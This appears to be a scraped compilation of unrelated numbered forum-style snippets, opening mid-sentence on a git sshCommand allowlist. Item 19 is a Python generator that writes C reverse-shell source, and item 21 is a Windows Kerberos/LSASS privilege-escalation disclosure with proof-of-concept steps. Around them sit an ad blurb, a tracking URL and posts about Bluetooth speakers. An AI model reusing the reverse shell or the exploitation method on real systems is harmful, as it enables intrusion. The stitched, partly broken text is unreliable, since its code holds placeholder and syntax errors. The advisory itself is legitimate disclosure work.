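The allowlist rejects the subcommand name rather than searching for core.sshCommand, because git also accepts the same setting through a global -c option or the GIT_SSH_COMMAND environment variable; the log scan, by contrast, keys on the setting itself so that it still fires on an unpatched server.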
  18. Powered by advanced AI machine learning inpainting technology. Tips: Try to hug the box to the ENTIRE object (AVOID partial selection), regardless of whether it is partially blocked. "Undo" can handle box selections, brush strokes and removal results. URL: https://cleanupphotos.com Source
  19. This is a C language reverse shell generator that is written in Python.

import time
import sys
import pyautogui
import subprocess


# Loading()
def processing():
    animation = ["[■□□□□□□□□□]", "[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]",
                 "[■■■■■■□□□□]", "[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]
    for i in range(len(animation)):
        time.sleep(0.3)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
    print("\n")


# C language reverse shell generator code:
def C_rev():
    print("Welcome to R-Security C reverse shell generator")
    print("1 - C language rev shell")
    user = int(input("Please enter a number for rev shell: "))
    if user == 1:
        ip = input("Enter target IP: ")
        port = input("Enter target port: ")
        time.sleep(1)
        processing()
        with open("crevshell.c", "w") as payload:
            payload.write("""
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = ENTER_TARGET_PORT_HERE;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("[ENTER_TARGET_IP_HERE");

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"pwsh", NULL};
    execve("{shell}", argv, NULL);

    return 0;
}
""")
        print("[*] Reverse shell created successfully!")
        print("[!] Do change the target IP and target PORT fields.")
        print('\033[1m' + "Thank you for using R-Security C reverse shell generator tool" + '\033[0m')


C_rev()

Source
  20. 2FA 3D Secure https://go.rapyd.net/card-acceptance-europe?utm_source=adwords&utm_medium=ppc&utm_term=credit card processing&utm_campaign=2020-07+Card+Acceptance+Europe&hsa_net=adwords&hsa_grp=131304370526&hsa_ad=576528181169&hsa_tgt=kwd-10007631&hsa_kw=credit card processing&hsa_ver=3&hsa_acc=3503966619&hsa_cam=13699788616&hsa_src=g&hsa_mt=b&gclid=EAIaIQobChMIobKGvor2-AIVkN1RCh3pbgMzEAAYASAAEgLYpPD_BwE
  21. On Windows, the buffer for redirected logon context does not protect against spoofing resulting in arbitrary code execution in the LSA leading to local elevation of privilege.

    advisory-info.txt

    Windows: Kerberos Redirected Logon Buffer EoP
    Platform: Windows Server 2022
    Class: Elevation of Privilege
    Security Boundary: User

    Summary: The buffer for redirected logon context doesn't protect against spoofing resulting in arbitrary code execution in the LSA leading to local EoP.

    Note: This is distinct from the previous issue I reported (case 70653). That was manipulating the redirected logon credentials buffer; this instead manipulated the buffer used to track the context between CredSSP and the final authentication. The previous issue might be exploitable remotely, whereas this is local only, as you need to be able to encrypt the buffers.

    Description: When a remote credential guard connection is made via CredSSP, the TSSSP needs to store the credentials for later use by the logon process. This is done by encrypting the credentials using the CredProtect API into a string which can later be passed as the password to LsaLogonUser to complete the logon. The encrypted credentials contain the pointer to the TSSSP context and function pointers to callback functions to get the redirected credentials. The structure also contains a GUID, but that's static across versions of Windows. If I had to guess, the developers assumed that because CredProtect encrypts using a per-logon-session key, a normal user couldn't encrypt their own buffer which would be accepted by the Kerberos package, as both TSSSP and Kerberos run in the SYSTEM logon session. Unfortunately that's not true: the CredProtectEx API (and the underlying RtlEncryptMemory API) added a flag to encrypt the buffer for use by the SYSTEM logon session; the user can't decrypt the buffer, but that doesn't matter. You do need to do a few tweaks to the buffer to get it accepted, but that requires no privileges.

    At a basic level this can be used to call an arbitrary function in LSASS by encrypting your own buffer and passing it to LsaLogonUser (or its higher level equivalents) as the password. This doesn't require that Terminal Services is enabled on the machine, but it does need Remote Guard enabled, otherwise the Kerberos package will ignore the buffer. LSASS does have CFG/XFG enabled, but you could call something like LoadLibrary or WinExec as you control the first parameter's pointer value. Getting memory addresses might not be that difficult, as it seems LSASS leaks pointers all over the place; for example, the TsPkgContext field in the MS-RDPEAR isolated credential request is just a heap address of the TS_CONTEXT pointer which contains the logon buffer, so you could therefore probably use CredSSP itself to set up a suitable buffer and leak its address for any in-process data you need.

    Fixing wise, the design of this is terrible and shouldn't have passed a basic security design review, but it is what it is. At least you probably should use a unique random value for the magic GUID so that it can't be trivially spoofed. However, be careful: the encryption scheme just seems to be CBC with no per-encryption salt or cryptographic authentication, which means that if you leave the GUID at the front it might be possible to copy the encrypted GUID from a real buffer (using CredSSP to generate it) and then corrupt the rest in such a way as to allow for exploitation.

    Proof of Concept: I've provided a PoC as a C++ project. This will just try and get LoadLibrary called with an arbitrary pointer. It's expected to crash LSASS; however, calling LoadLibrary is just to demonstrate it's possible. I've not put much effort into developing an end to end exploit as it isn't necessary.

    1) Compile the C++ project.
    2) Enable remote credential guard on the system using the registry from an admin prompt: reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD
    3) Run the POC as a non-admin user.

    Expected Result: The logon should fail.
    Observed Result: The LSASS process crashes trying to dereference an invalid pointer.

    This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-06-06.

    Related CVE Numbers: CVE-2022-24545, CVE-2022-30165.
    Found by: forshaw@google.com
    Download: GS20220706153551.tgz (6 KB)
    Source
  22. Kev

    Looking for IT administrator(s), so that users don't do anything stupid. I hope I can leave around the end of next month (July - August). Edit: e.g. spam, scams, etc.
  23. Hi, I own 5 blogs and I'm about to be admitted to a hospital in Europe, where the only thing I have access to on the TV is YouTube, and it takes a while to get access to everything (Google, Yandex, RST, etc.). Is there anyone trustworthy? You can leave me a private message. Thanks in advance.
  24. I tested it myself, it works: Bluetooth tethering, Sony + another device (my Android doesn't allow it). I can't find a cable in the village. Thanks man, but I can't find one, I only found RCA; I'd rather not buy online.
  25. OK, so I have two portable speakers with aux (input) and Bluetooth. I searched and found a jack cable <||------||>. Can I connect the two speakers to each other and then connect to them via Bluetooth? I can't find a Y jack cable. My Android doesn't allow it; I know it's possible, tested via Bluetooth.